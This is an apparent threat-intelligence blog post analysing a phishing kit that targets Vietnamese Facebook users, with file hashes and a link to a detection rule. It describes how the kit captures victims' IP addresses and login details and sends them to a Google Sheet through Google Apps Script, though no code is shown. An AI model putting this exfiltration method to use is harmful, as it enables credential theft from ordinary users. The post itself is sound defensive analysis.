By As we operate a StalkPhish instance which scan thousands suspicious links a day, we often find, let’s say originals, phishing kits to analyse. Today we found a phishing kit targeting vietnamese Facebook users:
We retrieved the source code as the zip file was still on the server. The phishing kit sources zip file contains only a page, some images and CSS, and a javascript function:
There is no e-mail exfiltration vector as we can see commonly: this kit uses Google sheet form ajax post function to exfiltrate stolen credentials!
Reading the HTML file source code, we can see the page grab the victim’s IP address, Domain, date:
As well as the identifiers entered by users:
Then the validation-function.js is called. This Javascript function, after data validation and serialization, go to send stolen data to a Google sheet, via a POST method, using it as a database:
This function uses Google Apps Script function which permit to write into Google sheet using the API!
Take aways
index.html (SHA256): 3cfd92bdd9a801382199a52624ecaa8b78a32dc80893f0a6186cce4128c6552b
phishing kit archive (SHA256): 34ee59548f8ba626568d91393acb76791a559f958c1f61bf5dabeb425e396640
Phishing Kit Yara Rule: https://github.com/t4d/PhishingKit-Yara-Rules/blob/master/PK_Facebook_GSheet.yar
StalkPhish - phishing and brand impersonation detection 